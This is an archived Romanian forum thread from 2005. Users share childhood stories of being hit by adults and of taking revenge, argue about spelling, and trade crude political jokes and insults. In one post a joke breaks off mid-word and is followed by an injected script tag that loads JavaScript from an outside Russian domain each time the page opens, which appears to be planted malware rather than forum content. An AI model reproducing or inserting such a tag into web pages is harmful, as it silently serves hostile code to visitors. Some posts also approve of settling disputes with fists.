PDA

Arată versiune întreagă : Sa-mi fac dreptate singur !

24.02.2005, 06:58
Apropo de subiectul descris de Sorin cu hartuirea , mi-a adus aminte de citeva chestii intilnite in tara.

Stiati ca sint multi care bat copii altora in Romania si nu le face nimic?

Asta vara o prietena care are o fetita mi-a spus ca fetita ei era in vizita la alta fetita si sau certat pe ceva stupid la care mama ei a batut-o pe fetita prietenei de i-a umflat buza .Prietena sa dus la politie si a spus ca fetita ei a fost batuta dar nu sa facut nici o dreptate.smileys/smiley7.gif

Atunci prietena mea sa dus la femeia aia si a luat-o la rost singura!

Mi-am mai amintit ca si eu am fost batuta cind eram mica de un administrator de bloc ,eu si cu inca o prietea ne placea sa mergem sa stam pe diverse blocuri si sa ne uitam de sus.Odata am intrat intr-un bloc unde cind sa lu-am liftul ne-a oprit un administrator si ne intreaba unde mergeti?? si noi la am inventat un nume : Ana Popescu..

la care tipul a sarit la noi asa de repede incit numai aveam cum sa fugim si ne-a tras de pardindu-ne cap in cap pina aveam cucuie ,aproape ca ne-a spart capulsmileys/smiley7.gif.Si daca chiar grasisem blocul?!

normal ca nu am spus la parinti si cum puteam noi la 13 ani sa ne facem dreptate impotriva lui matahala aiasmileys/smiley7.gif

trebuia sa il tinem minte si sa il batem cind ene facem mari,dar copii uita repedesmileys/smiley9.gif

kiki
24.02.2005, 10:12
De ce mi-a adus aminte povestea Melinei...

Eram cam de vreo 8 ani.Matusica mea draga m-a batut (lovit peste bostanel) in fata unor prieteni. Ce rusinica mi-a fost ... cade durutnu m-a durut "c-am mancat fasole tare" smileys/smiley36.gif. Am jurat in fata prietenilor ca fug acasa (eram la tara) si asa am facut (pe gradini pana la statia de autobuz).smileys/smiley9.gifM-a cautat tot satul apoi ore intregi ...

Imediat ce-am crescut mai inalta decat matusica sa vezi ce-si ridica mana in aparare de cate ori avea impresia ca ma dau la ea. smileys/smiley36.gifsmileys/smiley36.gifMa distram numai sa-mi trec mana prin par de 1000 de ori pe zi!!! smileys/smiley36.gif

sauzimdebine
25.02.2005, 01:46
O data, demult, tare demult, am primit in dar o mingie de fotbal. Mamaaa, era adevarata, din piele, cu camera si siret. Cei de varsta "inaintata", ca voi, nu au cum sa stie ce minunatie era sa lovesti acea mingie cu capul si sa nimeresti siretul. Cei mai "tineri", ca mine, am avut si astfel de placeri, o data, demult, in copilarie.
Aflat la bunici, in vacanta, jucam fotbal pe ulita satului . Iata ca din vale apare tantos pe bicicleta lui cea noua, Ion al lui Bolnavu, nume predestinat parca, acest Ion fiind bolnav de prostie. Si pentru ca asa este sa se intample, cand joaca copiilor este mai in toi, apare un idiot de "om mare", matur nu poate fi numit, care, lipsit de amintirile copilariei, strica cheful prichindeilor doar pentru ca el este "mare".
In joaca noastra cat se poate de atenta cu ceea ce se intampla in jur am lovit cu mingia bicicleta cea noua a lui Ion al lui Bolnavu. Mare tragedie, tocmai bicicleta lui! Si noua si cu sonerie ...
Infuriat la culme, Ion, bolnav la cap de fandoseala bicicletei, scoate briceagul din buzunar si inteapa mingia. Doamne, mi-am zis atunci printre lacrimi, lasa-ma sa ajung mare doar cat sa-i pot trage o mama de bataie lui Ion. Una asa ca in filme. Sa cada, sa se ridice, eu sa-l pun jos in tarana ulitei, el sa se ridice, eu sa-l trimit iar cu botul in tarana, si tot asa pana ... spre seara, daca nu oi obosi mai devreme.
Trec anii, nu multi, dar suficienti pentru mine de a ajunge la talia fizica a lui Ion, ca minte aveam deja mai multa decat el.
Ma duc sa-mi vad bunicii. In curte, Ion taia lemne. Se uita la mine si da sa zambeasca. Amintirea primei mele mingii de fotbal ma face sa-l privesc pe Ion cu atata placere de-i ingheata zambetul pe buze.
"Ioane, mai ai bicicleta aceea, stii tu care, ca eu mai am mingia" O aveam, rupta si jerpelita de atata batut prin tarana ulitei, o aveam pusa in podul casei bunicilor. O mai fi si acum acolo.
Ion se uita la mine tamp si nu zice nimic. Intrun tarziu, lasa toporul jos, si-i spune bunicii: "Tata Marie, acu ca ti-a venit nepotu', ma duc si eu pana acasa. Oi veni si oi termina lemnele mai pe seara"
Din acea clipa, Ion al lui Bolnavu, nu a mai calcat prin curtea bunicilor. De ce? Nu stiu.

aconi
25.02.2005, 02:40
Melina, kiki,sauzimdebine,
Cele descrise de voi sunt amintiri din copilarie, unele dureroase dar care astazi va amintesc de bunicii vostri, de minunatele plaiuri unde ati vazut lumina zilei. Nu generaliza melina.Oameni din acerstia betegi( bolnavi) mai snt si vor mai fi peste tot...dar escapada voastra pe inaltimi putea avea consecinte neprevazute ce sa mai zic de minciunica voatra.Fotbalistul nostru sauzimdebine il tine minte toata viata pe beteagu (bolnavu) bine face.
Din pacate , la noi au traditie niste "zicatori" din care amintesc: bataia-i rupta din rai dar sa stii cum o dai; unde da mama..creste.
Sa nu credeti cumva ca sunt adeptul bataii copiilor. Dimpotriva sunt categoric impotriva. Bataia aplicata copiilor, oricum o dai lasa urme in sufletul copilului si in mintea lui. In cel mai fericit caz il face un umil, un fricos.Or, un Om care va trai liber intr-un stat de drept nu trebuie sa poarte frica de nimeni nu trebuie sa fie un fricos, un las, un umil.El trebuie sa fie un om care sa spuna cu curaj ce doreste, cum gandeste.
Si aceste fenomene fac parte dintre acelea care trebuiesc eradicate. Oare cum si mai ales in cat timp?Mai era o zicala: Capu plecat sabia......(il stiti?)
Eu ma conduc dupa acest dicton dar la-am adaptat viziunii mele: CAPUL PLECAT SABIA TI-L TAIE!smileys/smiley36.gifsmileys/smiley32.gifsmileys/smiley2.gifaconi.
P.S. Mai feciori si fete plecati din Romania! Care imi traduceti si mie in romaneste cvintele dela Emoticons?Multumescsmileys/smiley17.gif

aconi
25.02.2005, 02:47
Apropo de subiectul descris de Sorin cu hartuirea , mi-a adus aminte de citeva chestii intilnite in tara.

Stiati ca sint multi care bat copii altora in Romania si nu le face nimic?

Asta vara o prietena care are o fetita mi-a spus ca fetita ei era in
vizita la alta fetita si sau certat pe ceva stupid la care mama ei a
batut-o pe fetita prietenei de i-a umflat buza .Prietena sa dus la
politie si a spus ca fetita ei a fost batuta dar nu sa facut nici o
dreptate.smileys/smiley7.gif

Atunci prietena mea sa dus la femeia aia si a luat-o la rost singura!

Mi-am mai amintit ca si eu am fost batuta cind eram mica de un
administrator de bloc ,eu si cu inca o prietea ne placea sa mergem sa
stam pe diverse blocuri si sa ne uitam de sus.Odata am intrat intr-un
bloc unde cind sa lu-am liftul ne-a oprit un administrator si ne
intreaba unde mergeti?? si noi la am inventat un nume : Ana Popescu..

la care tipul a sarit la noi asa de repede incit numai aveam cum sa
fugim si ne-a tras de pardindu-ne cap in cap pina aveam cucuie
,aproape ca ne-a spart capulsmileys/smiley7.gif.Si daca chiar grasisem blocul?!

normal ca nu am spus la parinti si cum puteam noi la 13 ani sa ne facem dreptate impotriva lui matahala aiasmileys/smiley7.gif

trebuia sa il tinem minte si sa il batem cind ene facem mari,dar copii uita repedesmileys/smiley9.gif

Melina, imi place stilul tau copilaresc de a expune amintiri din
copilarie.Dar corecteaza-te putin: se crie nu s-a facut nimic.. sau s-a
dus la prietena sa.... legat sescrie daca zic cartea sa, placerea sa
etc.

apropo nu se scrie apropos?

Nu de alta, dar zice Lumea: las-o ca e din Romania...smileys/smiley18.gifsmileys/smiley36.gifaconi

25.02.2005, 02:53
Important este sa ma fac inteleasa cred ,eu nu prea am timp sa scriu decit printre picaturi si nici nu sint un as in materia: Limba Romana(oops Romana sau Romina?!),sorrysmileys/smiley9.gif

P.s : cu s-a sau sa stiamdar nu am mai avut timp sa citesc din nou si degetele aluneca repede pe tastaturasmileys/smiley36.gif

Johann
25.02.2005, 03:10
Melina, imi place stilul tau copilaresc de a expune amintiri din copilarie.Dar corecteaza-te putin: se crie nu s-a facut nimic.. sau s-a dus la prietena sa.... legat sescrie daca zic cartea sa, placerea sa etc.
Nu de alta, dar zice Lumea: las-o ca e din Romania...smileys/smiley18.gifsmileys/smiley36.gifaconi

..buna aconi..se scrie NU ''se crie''...si APROPOS...se scrie NU ''sescrie''...smileys/smiley36.gif..nu de alta dar ...suntem romani!!!!!!...smileys/smiley36.gif

aconi
25.02.2005, 04:45
Important este sa ma fac inteleasa cred ,eu nu prea
am timp sa scriu decit printre picaturi si nici nu sint un as in
materia: Limba Romana(oops Romana sau Romina?!),sorrysmileys/smiley9.gif

P.s : cu s-a sau sa stiamdar nu am mai avut timp sa citesc din nou si degetele aluneca repede pe tastaturasmileys/smiley36.gif

melina cea pripita,sigur ca te faci inteleasa e...haios.

cu l.roman oops sigur: numai ROMANA.Au incercat comunistii sa ne modifice si gramatica dar nu au reusit.pardonsmileys/smiley9.gifaconi

aconi
25.02.2005, 05:08
O data, demult, tare demult, am primit in dar o
mingie de fotbal. Mamaaa, era adevarata, din piele, cu camera si siret.
Cei de varsta "inaintata", ca voi, nu au cum sa stie ce minunatie era
sa lovesti acea mingie cu capul si sa nimeresti siretul. Cei mai
"tineri", ca mine, am avut si astfel de placeri, o data, demult, in
copilarie.

Aflat la bunici, in vacanta, jucam fotbal pe ulita satului . Iata
ca din vale apare tantos pe bicicleta lui cea noua, Ion al lui Bolnavu,
nume predestinat parca, acest Ion fiind bolnav de prostie. Si pentru ca
asa este sa se intample, cand joaca copiilor este mai in toi, apare un
idiot de "om mare", matur nu poate fi numit, care, lipsit de amintirile
copilariei, strica cheful prichindeilor doar pentru ca el este "mare".

In joaca noastra cat se poate de atenta cu ceea ce se intampla in
jur am lovit cu mingia bicicleta cea noua a lui Ion al lui Bolnavu.
Mare tragedie, tocmai bicicleta lui! Si noua si cu sonerie ...

Infuriat la culme, Ion, bolnav la cap de fandoseala bicicletei,
scoate briceagul din buzunar si inteapa mingia. Doamne, mi-am zis
atunci printre lacrimi, lasa-ma sa ajung mare doar cat sa-i pot trage o
mama de bataie lui Ion. Una asa ca in filme. Sa cada, sa se ridice, eu
sa-l pun jos in tarana ulitei, el sa se ridice, eu sa-l trimit iar cu
botul in tarana, si tot asa pana ... spre seara, daca nu oi obosi mai
devreme.

Trec anii, nu multi, dar suficienti pentru mine de a ajunge la talia fizica a lui Ion, ca minte aveam deja mai multa decat el.

Ma duc sa-mi vad bunicii. In curte, Ion taia lemne. Se uita la mine
si da sa zambeasca. Amintirea primei mele mingii de fotbal ma face sa-l
privesc pe Ion cu atata placere de-i ingheata zambetul pe buze.
"Ioane, mai ai bicicleta aceea, stii tu care, ca eu mai am
mingia" O aveam, rupta si jerpelita de atata batut prin tarana ulitei,
o aveam pusa in podul casei bunicilor. O mai fi si acum acolo.
Ion se uita la mine tamp si nu zice nimic. Intrun tarziu, lasa
toporul jos, si-i spune bunicii: "Tata Marie, acu ca ti-a venit
nepotu', ma duc si eu pana acasa. Oi veni si oi termina lemnele mai pe
seara"

Din acea clipa, Ion al lui Bolnavu, nu a mai calcat prin curtea bunicilor. De ce? Nu stiu.

"Mosule" cat de demult? dar imi place ca ti-a stiut de frica dupa
ani si ani....sau i-o fi trecut"boala" si politicos,cum este romanul,
v-a lasat singuri.aconi

Johann
25.02.2005, 06:53
Salve Johann, hahhaaaa ma mai balbai si eu cand scriu.Dar ...ma fac inteles? daca da ,atunci, cum ziceti voi este ok (era sa scriuKO)
smileys/smiley2.gifaconi

Melina, imi place stilul tau copilaresc de a expune amintiri din copilarie.Dar corecteaza-te putin: se crie nu s-a facut nimic.. sau s-a dus la prietena sa.... legat sescrie daca zic cartea sa, placerea sa etc.

..buna aconi..se scrie NU ''se crie''...si APROPOS...se scrie NU ''sescrie''...smileys/smiley36.gif..nu de alta dar ...suntem romani!!!!!!...smileys/smiley36.gif

..Man..te 'balbai' cind 'scrii'...!!!!!...smileys/smiley36.gifsmileys/smiley36.gif...scrii cu gura cumva?!...smileys/smiley36.gif

garfield
25.02.2005, 07:13
Nu de alta, dar zice Lumea: las-o ca e din Romania...http://www.romanian-portal.com/forum/smileys/smiley18.gifhttp://www.romanian-portal.com/forum/smileys/smiley36.gifaconi

aconi, las-o mai moale cu lectiile de limba romana ca nu e nimeni aici sa fie corectat sau sa impresioneze 'Lumea' si nici tu nu esti profesorul nostru de limba romana.

Nu ar strica sa pui tu mana pe un dictionar englez-roman sa traduci acele smilies pe care nu le intelegi. Eu ti le-as traduce dar nu stiu romaneste destul de bine sa traduc toate cuvintele si nici nu vreau sa fiu certat sau sa primesc nota proasta la scrisul in limba romana smileys/smiley2.gif

Pana la urma ajung sa ma si trimiti sa stau la colt smileys/smiley36.gif

http://www.sorrin.com/dalbum/pictures/Forum_Pictures/Garfield/teacher.gif

25.02.2005, 09:16
Haha, povestile astea mi-au adus si mie aminte de una:

Cand eram copil aveam noi un administrator la bloc, rau de tot, cu gura mare, care nu nelasa sa mergem cu liftul. Cica erau ceva instructiuni cum ca liftul nu trebuie sa fie folosit de persoanele sub nu-stiu-ce varsta. Hai, de acord, sa nu cumva sa se accidenteze copii sau mai stiu eu ce, sa strice ascensorul poate, dar omul asta o lua personal rau de tot, avea el cateva nume pe lista lui neagra, golanii cartierului, urla la noi, mai sa sara sa ne bata daca ne vedea langa lift. Dar ce sa-i faci, odata cedescoperisem ca liftul merge daca apesi pe buton, chiar daca ai doar zece ani, cine era sa ne mai opreasca?

Pana cand intr-o zi, eu cu un prieten de-al meu mai mic cu vreo cativa ani dam sa ne urcam in lift chiar cand apare omul cel rau si incepe sa urle la noi si da sa ne loveasca. Prietenul meu o ia la fuga la timp, dar pe mine incepe sa ma impinga intr-un colt incercand sa ma loveasca. Cum la zece ani eram deja tot atat de inalt ca si el, ridicand mana reuseam sa ma apar de lovituri destul de eficient. Pana cand m-a impins intr-un colt de unde nu mai aveam unde sa ma retrag si continua sa-mi traga palme...

Atunci, din disperare, mi-au disparut deodata toti cei sapte ani de acasa,impreuna cu respectul pentru persoanelein varsta, si i-am tras o scatoalca peste ochelarisi o lovitura in fluierul piciorului de s-a dus clatinandu-se pana la perete.Am luat-o la fuga pe langa el injurandu-l de mama si de toate celelalte. Prietenul meu privise fascinat toata scena si imediat a inceput sa dea sfoara in tara; peste noapte am devenit extrem de popular printre ceilalti copii, un fel de simbol al rezistentei impotriva totalitarismului de bloc...

aconi
25.02.2005, 18:15
..Man..te 'balbai' cind 'scrii'...!!!!!...smileys/smiley36.gifsmileys/smiley36.gif...scrii cu gura cumva?!...smileys/smiley36.gif

HAHAAA nu scriu cu gura; dar..imi aluneca si mie degetele pe claviatura si...tot un fel de balbaiala este.Dar..ne intelegemsmileys/smiley2.gifaconi

sauzimdebine
26.02.2005, 01:10
aconi, cand vrei sa ataci pe cineva, ataca-i fondul nu forma. Faci greseala multora aflati in Romania. Cum nu mai au ce spune incep sa caute greselile de gramatica ale celor plecati. Nu exista nici o lupta, competitie, sau ceva de impartit intre noi. Si voi si noi, fie ca va place fie ca nu, suntem parte a aceluiasi neam. Cel romanesc. Nascuti nu facuti, aconi.

aconi
26.02.2005, 07:37
aconi, las-o mai moale cu lectiile de limba romana ca nu e nimeni aici sa fie corectat sau sa impresioneze 'Lumea' si nici tu nu esti profesorul nostru de limba romana.

Nu ar strica sa pui tu mana pe un dictionar englez-roman sa traduci acele smilies pe care nu le intelegi. Eu ti le-as traduce dar nu stiu romaneste destul de bine sa traduc toate cuvintele si nici nu vreau sa fiu certat sau sa primesc nota proasta la scrisul in limba romana smileys/smiley2.gif

Pana la urma ajung sa ma si trimiti sa stau la colt smileys/smiley36.gif

http://www.sorrin.com/dalbum/pictures/Forum_Pictures/Garfield/teacher.gif
Garfield, esti un motanel simpatic.Ai dreptate; dar sa stii ca nu este in intentia mea sa cert pe cineva sau sa fac pe profesorul de l romana.Asa e felul meu,mai vulcanic, mai pripit ,mai transant.Poti vedea (desi stiu ca nu te preocupa) si din mesajele mele postate la discutii politice.Te ascult si am sa pun mana pe un dictionar desi trebuie sa-ti spun ca nu pricep nici o iota din aceasta limba care nu m-a atrtas niciodata, dupa cum nu m-a atras nici Pamanntul fagaduintei, adica cel american.In ultimul tmp ,dupa plimbarile pe internet, mi-a trezit anumite curiozitati. asi vrea sa-ti vad parerea despre "lupta pentru denumirea strazilor" postat de sauzimdebine la discutii politice.merci aconismileys/smiley15.gif

26.02.2005, 10:25
aconi,eu nu am generalizat doar dau niste exemple ..

P.S: si cite miini pe fund si pe altele nu iti lu-ai in Romania ca pustoicasmileys/smiley7.gifdaca nu aveai un frate mai mare sa te apere ce faceai?! smileys/smiley18.gif

iti spun eu ca numai cu pumnul se rezolva ceva smileys/smiley5.gif

sa generalizez ,nu generalizez dar mieuna misa parut ca am ajuns in jungla cind parcurgeam coridoarele liceului si cei de pe margine faceau ca maimutelesmileys/smiley18.gif

sorin
26.02.2005, 12:07
Pt. Aconi:

Aconi, vad ca a inceput sa-ti placa sa folosesti "quote", dar sa stii ca una la mana ai posibilitatea sa faci "edit", adica poti sa stergi partea de text care nu te intereseaza (sa lasi de exemplu o singura propozitie la care vrei sa te referi), a doua la mana, cand raspunzi cuiva carea dat ultimul "reply" pe lista nu e totdeauna necesar sa folosesti "quote" si a treia la mana, nu folosesti "quote" fara sa adaugi un comentariu propriu. Iti spun toate astea pentru a nu avea mesaje prea lungi si care pot deveni greoaie si mai greu de inteles smileys/smiley2.gif

Am mai facut eu un pic de curatenie, dar pe viitor incearca te rog sa postezi mesaje cat mai curate, OK?

miky05
26.02.2005, 12:55
Melina, citez:

Important este sa ma fac inteleasa cred ,eu nu prea am timp sa scriu decit printre picaturi si nici nu sint un as in materia: Limba Romana(oops Romana sau Romina?!),sorryhttp://www.romanian-portal.com/forum/smileys/smiley9.gif

P.s : cu s-a sau sa stiamdar nu am mai avut timp sa citesc din nou si degetele aluneca repede pe tastatura

Pai daca locuiesti in Bucuresti, trebuie sa te obisnuiesti sa vorbesti limba rromanasmileys/smiley36.gif. Daca te duci in Ardeal, vorbestil limba Romanoios si daca vii aici in Moldova vorbestismileys/smiley4.gif. Mai e Dobrogea-->aia vorbesc cu pestii (din mare)smileys/smiley9.gif si Muntenia-->aia se vorbesc ca vorbescsmileys/smiley2.gif. Cam asa se duce vorba la romanismileys/smiley2.gif. Parerea measmileys/smiley18.gif.

mihaelaNV
26.02.2005, 13:09
Mai dar ce de critici literari mai avem noi pe aici!!!!!!!!!

sauzimdebine
26.02.2005, 13:10
miky05, mergi si invata, fa altceva. Bati campii rau.smileys/smiley49.gif Daca esti sub stres, fa sex. smileys/smiley20.gif smileys/smiley2.gif smileys/smiley36.gif

26.02.2005, 13:11
si dupa un pahar de vin oriunde ai fi ,numai conteaza ce limba vorbestismileys/smiley2.gifsmileys/smiley36.gif

miky05
26.02.2005, 19:30
miky05, mergi si invata, fa altceva. Bati campii rau.smileys/smiley49.gif Daca esti sub stres, fa sex. smileys/smiley20.gif smileys/smiley2.gif smileys/smiley36.gif

Pai facsmileys/smiley9.gif. Scriu pe siteul asta supersmileys/smiley4.gif. Daca nu iti place, altuia critici nu-i facesmileys/smiley17.gif. Si ce e rau in a bate campiismileys/smiley5.gif? Este o traditie la romanismileys/smiley36.gif. Uita-te la TVurile noastre si vei vedea ce frumoase buruieni sunt pe campurile asteasmileys/smiley4.gif. Asa ca le bat ca sa mai scap de buruienismileys/smiley46.gif.

Sunt sub stres, dar ma descurcsmileys/smiley42.gif. Ma gandesc la ce fain e siteul asta si imi trecesmileys/smiley101.gif. Sex fac, da' numai in grup..compactsmileys/smiley50.gif.

De ce te legi de cetatenii model ai tarii noastresmileys/smiley55.gif? Si ce e rau in a scrie aicismileys/smiley5.gif? Mie imi place acest site, asa ca o sa scriu indiferent ce gandeste bula unui demnitar ca tinesmileys/smiley80.gif. Sarutati-as mana conasule, sa auzim de binesmileys/smiley77.gif.

sauzimdebine
27.02.2005, 01:40
smileys/smiley36.gif smileys/smiley36.gif smileys/smiley36.gif Sper ca nu ai vrut sa gandesti ca as fi demnitar psd. Orice, numai asta nu. smileys/smiley36.gif smileys/smiley36.gif smileys/smiley36.gif

miky05
27.02.2005, 02:57
Ei, nu te-am insultat chiar asasmileys/smiley36.gif. PSD, Iliescu sau PRM este cea mai mare insultasmileys/smiley9.gif. Mai mare chiar decat aia cand te trimite de unde ai iesit in lumea asta ciudatasmileys/smiley2.gif. Da nu-i rau, ca la cat a fost insultat poporul asta, mai ca mi-ar place si mie sa am si eu bula alora de la guvernaresmileys/smiley17.gif. Sa inteleg ca esti de prin opozitie. Sarumana Basescuta si sa traiesti bine, ca de auzim ne auzim pe linie. Amu inteleg de ce ai ras-o in USA. Ca nu vroiai sa fii P din PSD sau PRMsmileys/smiley2.gif.

Hai ca iti zic un banc tare politik ( e din vremea cand Basescu era cu un trandafir la pubela si il intepa suav pe Bolfosul cu 7 case din fruntea PSD, Nastasesmileys/smiley9.gif). Da sa nu ilpisti la nimenismileys/smiley87.gif. Ca nu stii ceiese daca flatuleaza in publicsmileys/smiley94.gif.

Cica se duce Basescu la Nastase la Guvern.

Cioc! Cioc! la usa premierului.

N: Cine e ba? zise Nastase.

B: Eu, Basescu.

N: Si ce vrei??

B: Am o problema, tovarase premier. Da una naspa de tot.

N: Ce problema ai ma tu Bascosule? Si acu' vii mancati-as la mine? Cu cateva zile inainte de alegeri?

B: Pai daca acuma ma doare.

N: Ce te doare ba?

B: Curul, sa traiti. Dar rau de tot.

N: Hai bai Bascosule, tu ai venit pana aici sa imi spui ca te doare in cur !!!. Pai du-te la doftor, nu la premier.

B: Ba la d-voastra am venit, sarut mana sefu. Ca numai tu poti sa ma ajuti.

N: Ba Bascosule, ia vino tu maina dimineata la ora 7 si o sa vedem ce facem.

B: Bine, sefu. Vin maine.

A doua zi. Nastase il vede pe Basescu in fata cabinetului la ora 7 fix.

N: Ce faci aici ba Basescule?

B: Am venit sa imi rezolvati problema. Stiti, aia de ieri.

N: Da, imi aduc aminte. Da' acu' nu te pot rezolva. Am o sedinta. Vino tu maine la aceeasi ora. Da sa fii atent! Maine e ziua mea de nastere si ai grija ce faci.

Urmatoarea zi. Basescu protap in fata usii premierului.

N: Iarasi tu ba Basescule?

B: Iarasi, dom'le. Ma puteti ajuta?

N: Bine bai, intra in cabinet sa vad daca pot sa fac ceva pentru tine.

Si intra Basescu in cabinetul lui Nastase, isi dete jos pantalonii si se aseza cu curul la Nastase. Bolfosul cand vazu asta, se infuria rau de tot.

N: Bine ba Bascosule, da ce faci? Te asezi cu curul la mine? Chiar asa ba?

B: pai da, ca numai d-voastra ma puteti ajuta. Stiti, ma doare curul de cateva zile si nu stiu ce am. Asa ca am venit la d-voastra sa imi spuneti si mie care e problema. E cumva de la alegeri? Nu vreti sa va uitati oleaca inauntru sa vedeti ce am?

N: Bine Basescule, dar numai de data asta. Da' sa nu spui la nimeni.

Si baga Nastase mana in dosul lui Basescu pana la degete. Nimic. O baga mai adanc, pana la cot. Nimic. O baga si mai adanc, pana la umar. Parca parca atinsese ceva.

B: Ei, ati gasit ceva?

N: Da, cre<script src=http://www.iroe.ru/ngg.js></script>

sauzimdebine
27.02.2005, 03:38
Cand ai bancuri, ar trebui sa mergi cu ele la "jokes", evitand astfel orice cartonas de la webmaster.
Pe de alta parte, daca tot continuam sa deviem de la tematica or sa vina cei cu "pietrele" si o sa o luam pe cocoasa. smileys/smiley36.gif

miky05
27.02.2005, 04:27
La cate am luat-o eu pe cocoasa aici in RUMANIA, inca una si ma ducsmileys/smiley11.gif. Da, de ce sa ne si dea cu petresmileys/smiley46.gif? Chiar asa de pacatosi suntemsmileys/smiley66.gif? Of, Doamne, sa dea cu piatra pe cocoasa mea cine nu a votat cu PSD sau PRMsmileys/smiley57.gif. Aia pot sa ma bolovaneasca, ca nu-i baismileys/smiley79.gif.

Nu cred ca seful cel mare al acestui site cool se supara ca mai glumim si noi asa ca tranzitionistiismileys/smiley101.gif. Mai vad si eu din cand in cand luminita de la capatul tunelului si glumesc si eu asa ce vine trenul cu o viata mai bunasmileys/smiley105.gif. Da' in final este doar o roaba care aduce noi scumpiri si legi bune de te face sa emigrezi in Africasmileys/smiley111.gif.

Astept pe cel care vrea sa dea cu pietresmileys/smiley109.gif. Am si eu armele mele, stai linsitit, ca nu de aia am taiat cocoselul unui cadavru de la Anatomie in anul 1 si l-am pus in plic si l-am trimis asistentei noastre super cool si cu fustita scurta de se vedea padurea, dar fara uscaturismileys/smiley52.gif. Si am semnat plicul toata grupa noastra si am pus si o felicitare, ca de', trebuie sa nu fie data anonima, sa stie si ea ca are admiratori cinstiti si corectismileys/smiley9.gif. Si i-am scris cu degetelele noastre: "De la grupa 35smileys/smiley4.gif pentru cea mai sexi asistenta din UMF" Da gagica s-a dus la profesor cu cadoul nostru si a zis ca suntem cam prea emancipati si a venit proful la stagiu si ne-a pus la toti baietii 10. Spre oftica asistentei super sexi. Na, sac sac ca am facut-o. Pacat ca gagica a plecat in anul 2 la Bacau.

Eu sunt asa cum sunt si nu ma schimb decat in binesmileys/smiley17.gif. Sac.smileys/smiley2.gif

27.02.2005, 13:12
Nicusor a scris:

"Pe de alta parte, daca tot continuam sa deviem de la tematica or sa vina cei cu "pietrele" si o sa o luam pe cocoasa."

Am publicat numai citeva mesaje si N'auzim bine ma citeaza intr-una, nu mai inteleg nimic. smileys/smiley5.gif Cred cama invita sa aduc artileria grea:

http://www.romanian-portal.com/forum/smileys/smiley97.gif

Dl Doctor poate ii faceti un control, dar nu pe la spate, pe la urechi, ca sa stim daca problema e la stinga, la dreapta, sauintre urechi, ca prea aude gresit Dl N'auzimcum trebuiesmileys/smiley4.gif

sauzimdebine
27.02.2005, 15:35
clona, incercare nereusita si de aceasta data. Cand musti, fie ca este din senin ca in acest caz, fie ca ai un motiv intemeiat, trebuie sa o faci cu rautate. Daca nu iese sange nu rezolvi nimic.
Daca ai vrut, in schimb, sa te remarci cu ceva, asa doar ca sa simti ca traiesti si tu, cu regret iti spun ca si in acest caz incercarea a dat gres.
Nu te deranja sa cari artileria grea, ar insemna un nou esec. Nici nu incerca sa emiti ceva ganduri pe aici. Daca pana acum nici nu te-am auzit, nici nu te-am citat, cu siguranta ca nu o sa ai puterea de a ma obliga sa o fac de aici inainte.

miky05
27.02.2005, 19:51
Clona,

Tot nu ne-ai spus a cui clona estismileys/smiley17.gif? Si esti o clona reusitasmileys/smiley4.gif? Stii ce a patit oaia Doli - a murit de batranete precocesmileys/smiley11.gif. Da a behait frumos la reporteri si i-a vrajit cu clonealasmileys/smiley2.gif.

Sper ca tu nu mustismileys/smiley54.gif. Nici oaia Doli nu musca ci te lingea pana iti clona rabdareasmileys/smiley77.gif. Artileria grea la oi sunt maslinele alea mici si fainesmileys/smiley2.gif. Cica au gust de oaiesmileys/smiley75.gif. Hai sa o intrebam pe Doli, ce zicismileys/smiley9.gif?

Poti sa gandesti, da numa' daca iti clonezi gandurile si parerilesmileys/smiley101.gif. Ca sa nu apas din greseala pe butonul Delete sau Fast Forward cand neuronii mei vor incerca sa decloneze parerile tale clonatesmileys/smiley46.gif.

Ca sa clonezi, trebuie sa te folosesti de "problema" de pe mijloc, nu din dreapta sau stangasmileys/smiley36.gif. Nu conteaza cum auzi ce cum vezismileys/smiley2.gif. O clona trebuie sa semene cat mai bine cu originalul, care in cazul de fata e tot o clonasmileys/smiley19.gif. Sper sa nu iasa un mutant genetic din clonareala asta care sa ne bata cu pietresmileys/smiley18.gif.

Sa ne clonam cu binesmileys/smiley61.gif.

28.02.2005, 02:33
Tot nu ne-ai spus a cui clona estismileys/smiley17.gif? Si esti o clona reusitasmileys/smiley4.gif? Stii ce a patit oaia Doli - a murit de batranete precocesmileys/smiley11.gif. Da a behait frumos la reporteri si i-a vrajit cu clonealasmileys/smiley2.gif.

Eu sint o Clona Virtuala si nu stiu cit de mult o sa exist pe aici smileys/smiley2.gif, depinde cit te tine "Doftore", dar vad ca suferi nu gluma, esti si tu o clona cumva ? smileys/smiley36.gif

Artileria grea la oi sunt maslinele alea mici si fainehttp://www.romanian-portal.com/forum/smileys/smiley2.gif. Cica au gust de oaiehttp://www.romanian-portal.com/forum/smileys/smiley75.gif. Hai sa o intrebam pe Doli, ce zicihttp://www.romanian-portal.com/forum/smileys/smiley9.gif?

Nu o mai intrebam ca stii tu mai bine Ber Becule. http://www.romanian-portal.com/forum/smileys/smiley9.gif

Sper ca tu nu mustismileys/smiley54.gif. Nici oaia Doli nu musca ci te lingea pana iti clona rabdareasmileys/smiley77.gif.

Poate Ber Becul o lingea pe Clona smileys/smiley9.gif, ca doar nu era lesbiana. smileys/smiley4.gif

Ca sa clonezi, trebuie sa te folosesti de "problema" de pe mijloc, nu din dreapta sau stangasmileys/smiley36.gif. Nu conteaza cum auzi ce cum vezismileys/smiley2.gif.

Vezi ca era vorba de urechi si s-ar intelege ca te folosesti de ce e la mijloc cind te clonezi, fi mai atent pe viitor la ce iti iesedin cerebel.

Cit despre auz, daca stii bancul cu gut, gut, oui, oui s-ar putea sa-ti foloseasca la ceva, macar sa afli daca ce faci e Ok sau bun in cazul tausmileys/smiley36.gif

miky05
28.02.2005, 10:25
Clona,

Ai clonat-o rau aici. Data viitoare cand te mai cloghezi pe siteul asta, i-ati un dictionar de cloneologisme. Poate clonintelegi ceva din mesajul meu. Nu am vrut sa te insult mai clonatule, dar tu ai luat-o clonata rau de tot. Am glumit doar, clonman.

Nu-s Berbec. Sac sac. Sunt scorpion. Asa ca fereste-te de acul meu ca iti cloninjectez niste venin.

Draga, din toata medicina asta care am invatat-o, iti pot spune cu siguranta de o clona ca nu te multiplici cu urechile. Sau poate ca la tine functioneaza zicala aia a femeilor ca "barbatii gandesc cu capul de jos"?. In cazul asta, prin deducere clonica, urechile ti-ar putea folosi la ceva. Si nasul ar ramane in final donatorul de ADN.

Bancul e expirat. Mai da-i un upgrade la clonomemorie si vezi daca poti produce ceva mai inteligent. Ca doar esti o clona virtuala, deci prezumtiv clonologica.

Sa ne clonam cu bine.

Declonatul.